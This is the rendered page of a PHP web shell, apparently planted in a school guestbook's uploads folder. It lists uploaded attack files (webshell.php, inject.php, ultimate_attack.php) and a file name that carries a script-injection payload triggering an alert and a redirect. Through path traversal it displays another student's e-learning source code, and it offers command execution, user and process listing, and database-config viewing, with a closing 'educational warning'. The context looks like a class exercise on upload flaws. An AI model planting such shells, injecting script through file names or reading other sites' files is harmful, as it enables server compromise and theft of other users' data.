🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../584557.klas4s23.mid-ica.nl/public_html/projects/e-learning/create-list.php

<?php
session_start();

if (!isset($_SESSION['user_id'])) {
  header("Location: login.php");
  exit();
}

if ($_SERVER["REQUEST_METHOD"] == "POST") {
  include 'db_conn.php';

  $list_title = $_POST['list-name'];
  $original_language = $_POST['language'];
  $user_id = $_SESSION['user_id'];
  $color = $_POST['color'];
  $publicity = $_POST['publicity'];
  $words_array = $_POST['words'];
  $translations_array = $_POST['translations'];

  $conn->begin_transaction();

  try {
    $sql = "INSERT INTO e_learning_lists (list_title, original_language, user_id, color, publicity) 
    VALUES (?, ?, ?, ?, ?)";
    $stmt = $conn->prepare($sql);
    $stmt->bind_param("ssiss", $list_title, $original_language, $user_id, $color, $publicity);
    $stmt->execute();

    $list_id = $conn->insert_id;

    for ($i = 0; $i < count($words_array); $i++) {
      $word = $words_array[$i];
      $translation = $translations_array[$i];

      if (empty($word) || empty($translation)) continue;

      $word_sql = "INSERT INTO e_learning_words (list_id, word_text, word_order) VALUES (?, ?, ?)";
      $word_stmt = $conn->prepare($word_sql);
      $word_stmt->bind_param("isi", $list_id, $word, $i);
      $word_stmt->execute();

      $word_id = $conn->insert_id;

      $trans_sql = "INSERT INTO e_learning_translations (word_id, translation_text) VALUES (?, ?)";
      $trans_stmt = $conn->prepare($trans_sql);
      $trans_stmt->bind_param("is", $word_id, $translation);
      $trans_stmt->execute();

      $word_stmt->close();
      $trans_stmt->close();
    }

    $conn->commit();
    header("Location: index.php");
    exit();
  } catch (Exception $e) {
    $conn->rollback();
    echo "Error: " . $e->getMessage();
  }

  $stmt->close();
  $conn->close();
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta author="Rick Deurloo">
  <meta name="description" content="Website description">
  <meta name="keywords" content="Website keywords">

  <link rel="stylesheet" href="https://site-assets.fontawesome.com/releases/v6.7.2/css/all.css">
  <link rel="stylesheet" href="https://site-assets.fontawesome.com/releases/v6.7.2/css/sharp-thin.css">
  <link rel="stylesheet" href="https://site-assets.fontawesome.com/releases/v6.7.2/css/sharp-solid.css">
  <link rel="stylesheet" href="https://site-assets.fontawesome.com/releases/v6.7.2/css/sharp-regular.css">
  <link rel="stylesheet" href="https://site-assets.fontawesome.com/releases/v6.7.2/css/sharp-light.css">

  <link rel="stylesheet" href="./styles/dist/css/style.css">
  <link rel="icon" href="./assets/favicon-en.png" data-translate-image="favicon">

  <title data-translate="createListTitle">English E-learning | Create list</title>
</head>
<body class="list-body">
  

  <?php include './php-components/header.php'; ?>

  <main>
    <form action="create-list.php" method="post">
      <h1 data-translate="createTitleForm">Create new list</h1>
      <div class="publicity-wrapper">
        <span data-translate="publicOption">Public</span>
        <input type="radio" name="publicity" id="public" value="public" checked>
        <span data-translate="privateOption">Private</span>
        <input type="radio" name="publicity" id="private" value="private">
      </div>
      <div class="input-wrapper">
        <input data-translate-placeholder="listName" type="text" name="list-name" id="list-name" placeholder="Listname..." required autocomplete="off">
      </div>
      <div class="language-wrapper">
        <span data-translate="EnterLanguage">Select the original language:</span>
        <div class="radios">
          <label for="english-radio">English</label>
          <input type="radio" name="language" id="english-radio" value="en" checked>
          <label for="dutch-radio">Nederlands</label>
          <input type="radio" name="language" id="dutch-radio" value="nl">
        </div>
      </div>
      <div class="color-wrapper">
        <span data-translate="pickColor">Pick a color:</span>
        <div class="radio-wrapper">
          <input type="radio" name="color" id="yellow" value="hsl(39, 100%, 65%)" checked>
          <input type="radio" name="color" id="orange" value="hsl(27, 100%, 65%)">
          <input type="radio" name="color" id="lightgreen" value="hsl(66, 43%, 65%)">
          <input type="radio" name="color" id="turquoise" value="hsl(142, 34%, 55%)">
          <input type="radio" name="color" id="darkgreen" value="hsl(151, 38%, 65%)">
          <input type="radio" name="color" id="blue" value="hsl(194, 40%, 65%)">
          <input type="radio" name="color" id="pink" value="hsl(347, 89%, 75%)">
          <input type="radio" name="color" id="darkpink" value="hsl(335, 100%, 65%)">
          <input type="radio" name="color" id="purple" value="hsl(305, 44%, 65%)">
          <input type="radio" name="color" id="lavender" value="hsl(237, 45%, 65%)">
        </div>
      </div>
      <div id="word-wrapper-container">
        <div class="word-wrapper">
          <input data-translate-placeholder="word" type="text" name="words[]" placeholder="Word..." required autocomplete="off">
          <div class="separator"></div>
          <input data-translate-placeholder="translationWord" type="text" name="translations[]" placeholder="Translation..." required autocomplete="off">
        </div>
      </div>
      <div class="add-remove-wrapper">
        <span id="add-more" class="add-more" data-translate="addMore">Add more +</span>
        <span id="removeItems" class="remove-items" data-translate="removeItems">Remove -</span>
      </div>
      <button class="submitCreate" type="submit" data-translate="submitCreate">Create</button>
    </form>
  </main>

  <script src="./js/general.js"></script>
  <script src="./js/translation.js"></script>
  <script src="./js/add-code.js"></script>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!